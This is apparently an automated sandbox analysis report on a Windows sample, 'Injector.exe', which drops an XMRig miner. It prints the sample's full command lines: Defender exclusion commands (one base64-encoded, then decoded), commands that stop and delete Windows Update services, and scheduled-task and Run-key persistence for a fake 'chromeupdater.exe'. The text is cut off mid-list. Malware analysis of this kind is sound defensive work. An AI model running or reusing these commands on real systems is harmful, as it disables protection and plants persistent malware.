Analysis
-
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-09-2022 18:44
Static task
static1
Behavioral task
behavioral1
Sample
INJECTOR/Injector.exe
Resource
win7-20220812-en
General
-
Target
INJECTOR/Injector.exe
-
Size
681.1MB
-
MD5
f57c9332808a063901254cd41eef7613
-
SHA1
67df58792e9a9d3c3d00e39753873fcf6ef2ae5f
-
SHA256
2b50d8d9acaab4c8679d87d37dda1e97464e3bdbb00c942277c58d7532098a50
-
SHA512
e032ca3899a93170f8a3e2d4be32deb66f21c5de02fc9f453bfd3709c0f54ff5eb75db58777ca1565dd57632b7c125de776b69737e8554761e1e15fd3b98e0eb
-
SSDEEP
393216:zKAhcUJ09+imj7+mmFygBWbln6eqOBZC517HNohLBn5Iv/vQ:2O090j7nmFVWhn/qOB8JiaQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
Process: reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
Processes: UNNAMED3.exe, chromeupdater.exe, conhost.exe
description | pid process | target process
PID 2492 created 2596 | 2492 UNNAMED3.exe | Explorer.EXE
PID 2492 created 2596 | 2492 UNNAMED3.exe | Explorer.EXE
PID 2492 created 2596 | 2492 UNNAMED3.exe | Explorer.EXE
PID 2492 created 2596 | 2492 UNNAMED3.exe | Explorer.EXE
PID 2492 created 2596 | 2492 UNNAMED3.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
PID 4836 created 2596 | 4836 conhost.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
PID 3668 created 2596 | 3668 chromeupdater.exe | Explorer.EXE
-
XMRig Miner payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp | xmrig
behavioral2/memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp | xmrig
-
Drops file in Drivers directory 2 IoCs
Processes:
Processes: UNNAMED3.exe, chromeupdater.exe
description | ioc | process
File created | C:\Windows\system32\drivers\etc\hosts | UNNAMED3.exe
File created | C:\Windows\system32\drivers\etc\hosts | chromeupdater.exe
-
Executes dropped EXE 6 IoCs
Processes:
Processes: UNNAMED.exe, UNNAMED2.exe, UNNAMED3.exe, UNNAMED4.exe, Windows Security Health Service.exe, chromeupdater.exe
pid | process
1796 | UNNAMED.exe
1876 | UNNAMED2.exe
2492 | UNNAMED3.exe
2564 | UNNAMED4.exe
2256 | Windows Security Health Service.exe
3668 | chromeupdater.exe
-
Stops running service(s) 3 TTPs
-
Processes:
resource | yara_rule
behavioral2/memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp | upx
behavioral2/memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp | upx
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Processes: Injector.exe, UNNAMED4.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | Injector.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | UNNAMED4.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 3 IoCs
Processes:
Processes: powershell.exe, powershell.exe
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
Processes: UNNAMED3.exe, chromeupdater.exe
pid | process
2492 | UNNAMED3.exe
2492 | UNNAMED3.exe
3668 | chromeupdater.exe
3668 | chromeupdater.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
Process: chromeupdater.exe
description | pid process | target process
PID 3668 set thread context of 4836 | 3668 chromeupdater.exe | conhost.exe
PID 3668 set thread context of 1472 | 3668 chromeupdater.exe | svchost.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
Processes: cmd.exe, UNNAMED3.exe, chromeupdater.exe, cmd.exe
description | ioc | process
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\chromeupdater.exe | UNNAMED3.exe
File created | C:\Program Files\Google\Libs\WR64.sys | chromeupdater.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
Processes: sc.exe (10 instances)
pid | process
1104 | sc.exe
1016 | sc.exe
1756 | sc.exe
4368 | sc.exe
5100 | sc.exe
4280 | sc.exe
1388 | sc.exe
3152 | sc.exe
4908 | sc.exe
3884 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
Processes: powershell.exe, powershell.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Processes: powershell.exe, UNNAMED3.exe, powershell.exe, powershell.exe, powershell.exe, chromeupdater.exe, powershell.exe, powershell.exe, conhost.exe, svchost.exe
pid | process (number of repeated entries in the report)
320 | powershell.exe (x2)
2492 | UNNAMED3.exe (x4)
4880 | powershell.exe (x2)
2492 | UNNAMED3.exe (x4)
1624 | powershell.exe (x2)
2492 | UNNAMED3.exe (x4)
2792 | powershell.exe (x2)
3668 | chromeupdater.exe (x4)
208 | powershell.exe (x2)
3668 | chromeupdater.exe (x4)
3304 | powershell.exe (x2)
3668 | chromeupdater.exe (x2)
4836 | conhost.exe (x2)
3668 | chromeupdater.exe (x4)
1472 | svchost.exe (x24)
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
656 | (process name not recorded in the report)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Processes: powershell.exe, powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 320 | powershell.exe
Token: SeDebugPrivilege | 4880 | powershell.exe
Token: SeDebugPrivilege | 1624 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1624 | powershell.exe
Token: SeSecurityPrivilege | 1624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1624 | powershell.exe
Token: SeLoadDriverPrivilege | 1624 | powershell.exe
Token: SeSystemProfilePrivilege | 1624 | powershell.exe
Token: SeSystemtimePrivilege | 1624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1624 | powershell.exe
Token: SeCreatePagefilePrivilege | 1624 | powershell.exe
Token: SeBackupPrivilege | 1624 | powershell.exe
Token: SeRestorePrivilege | 1624 | powershell.exe
Token: SeShutdownPrivilege | 1624 | powershell.exe
Token: SeDebugPrivilege | 1624 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1624 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1624 | powershell.exe
Token: SeUndockPrivilege | 1624 | powershell.exe
Token: SeManageVolumePrivilege | 1624 | powershell.exe
Token: 33 | 1624 | powershell.exe
Token: 34 | 1624 | powershell.exe
Token: 35 | 1624 | powershell.exe
Token: 36 | 1624 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1624 | powershell.exe
Token: SeSecurityPrivilege | 1624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1624 | powershell.exe
Token: SeLoadDriverPrivilege | 1624 | powershell.exe
Token: SeSystemProfilePrivilege | 1624 | powershell.exe
Token: SeSystemtimePrivilege | 1624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1624 | powershell.exe
Token: SeCreatePagefilePrivilege | 1624 | powershell.exe
Token: SeBackupPrivilege | 1624 | powershell.exe
Token: SeRestorePrivilege | 1624 | powershell.exe
Token: SeShutdownPrivilege | 1624 | powershell.exe
Token: SeDebugPrivilege | 1624 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1624 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1624 | powershell.exe
Token: SeUndockPrivilege | 1624 | powershell.exe
Token: SeManageVolumePrivilege | 1624 | powershell.exe
Token: 33 | 1624 | powershell.exe
Token: 34 | 1624 | powershell.exe
Token: 35 | 1624 | powershell.exe
Token: 36 | 1624 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1624 | powershell.exe
Token: SeSecurityPrivilege | 1624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1624 | powershell.exe
Token: SeLoadDriverPrivilege | 1624 | powershell.exe
Token: SeSystemProfilePrivilege | 1624 | powershell.exe
Token: SeSystemtimePrivilege | 1624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1624 | powershell.exe
Token: SeCreatePagefilePrivilege | 1624 | powershell.exe
Token: SeBackupPrivilege | 1624 | powershell.exe
Token: SeRestorePrivilege | 1624 | powershell.exe
Token: SeShutdownPrivilege | 1624 | powershell.exe
Token: SeDebugPrivilege | 1624 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1624 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1624 | powershell.exe
Token: SeUndockPrivilege | 1624 | powershell.exe
Token: SeManageVolumePrivilege | 1624 | powershell.exe
Token: 33 | 1624 | powershell.exe
Token: 34 | 1624 | powershell.exe
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
Processes: Injector.exe, UNNAMED4.exe, cmd.exe, cmd.exe, powershell.exe, cmd.exe, chromeupdater.exe, cmd.exe
description | pid process | target process (number of repeated entries in the report)
PID 2080 wrote to memory of 320 | 2080 Injector.exe | powershell.exe (x2)
PID 2080 wrote to memory of 1796 | 2080 Injector.exe | UNNAMED.exe (x3)
PID 2080 wrote to memory of 1876 | 2080 Injector.exe | UNNAMED2.exe (x2)
PID 2080 wrote to memory of 2492 | 2080 Injector.exe | UNNAMED3.exe (x2)
PID 2080 wrote to memory of 2564 | 2080 Injector.exe | UNNAMED4.exe (x2)
PID 2564 wrote to memory of 4288 | 2564 UNNAMED4.exe | schtasks.exe (x2)
PID 2564 wrote to memory of 2256 | 2564 UNNAMED4.exe | Windows Security Health Service.exe (x2)
PID 3048 wrote to memory of 4280 | 3048 cmd.exe | sc.exe (x2)
PID 3048 wrote to memory of 1388 | 3048 cmd.exe | sc.exe (x2)
PID 3048 wrote to memory of 3152 | 3048 cmd.exe | sc.exe (x2)
PID 3048 wrote to memory of 1104 | 3048 cmd.exe | sc.exe (x2)
PID 3048 wrote to memory of 1016 | 3048 cmd.exe | sc.exe (x2)
PID 3048 wrote to memory of 4060 | 3048 cmd.exe | reg.exe (x2)
PID 3048 wrote to memory of 4380 | 3048 cmd.exe | reg.exe (x2)
PID 3048 wrote to memory of 400 | 3048 cmd.exe | reg.exe (x2)
PID 3048 wrote to memory of 4808 | 3048 cmd.exe | reg.exe (x2)
PID 3048 wrote to memory of 4472 | 3048 cmd.exe | reg.exe (x2)
PID 3624 wrote to memory of 4668 | 3624 cmd.exe | choice.exe (x2)
PID 2792 wrote to memory of 1680 | 2792 powershell.exe | schtasks.exe (x2)
PID 1600 wrote to memory of 1756 | 1600 cmd.exe | sc.exe (x2)
PID 1600 wrote to memory of 4908 | 1600 cmd.exe | sc.exe (x2)
PID 1600 wrote to memory of 5100 | 1600 cmd.exe | sc.exe (x2)
PID 1600 wrote to memory of 4368 | 1600 cmd.exe | sc.exe (x2)
PID 1600 wrote to memory of 3884 | 1600 cmd.exe | sc.exe (x2)
PID 1600 wrote to memory of 4116 | 1600 cmd.exe | reg.exe (x2)
PID 1600 wrote to memory of 4864 | 1600 cmd.exe | reg.exe (x2)
PID 1600 wrote to memory of 3320 | 1600 cmd.exe | reg.exe (x2)
PID 1600 wrote to memory of 2328 | 1600 cmd.exe | reg.exe (x2)
PID 1600 wrote to memory of 4868 | 1600 cmd.exe | reg.exe (x2)
PID 3668 wrote to memory of 4836 | 3668 chromeupdater.exe | conhost.exe (x1)
PID 3092 wrote to memory of 4400 | 3092 cmd.exe | WMIC.exe (x2)
PID 3668 wrote to memory of 1472 | 3668 chromeupdater.exe | svchost.exe (x1)
Processes
-
C:\Windows\Explorer.EXE (level 1)
Command line: C:\Windows\Explorer.EXE
-
C:\Users\Admin\AppData\Local\Temp\INJECTOR\Injector.exe (level 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\INJECTOR\Injector.exe"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABuACMAPgA="
Decoded -EncodedCommand (base64 of UTF-16LE): <#ltk#>Add-MpPreference <#bhs#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#siu#> -Force <#vhn#>
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe (level 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe (level 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe (level 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe (level 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe (level 4)
Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Windows Security Health Service /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe" /f
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe (level 4)
Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"
- Executes dropped EXE
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (level 2)
Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (level 2)
Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exe (level 3)
Command line: choice /C Y /N /D Y /T 3
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (level 2)
Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#nkdsuy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Google" } Else { "C:\Program Files\Google\chromeupdater.exe" }
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe (level 3)
Command line: "C:\Windows\system32\schtasks.exe" /run /tn Google
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (level 2)
Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 3)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\system32\reg.exe (level 3)
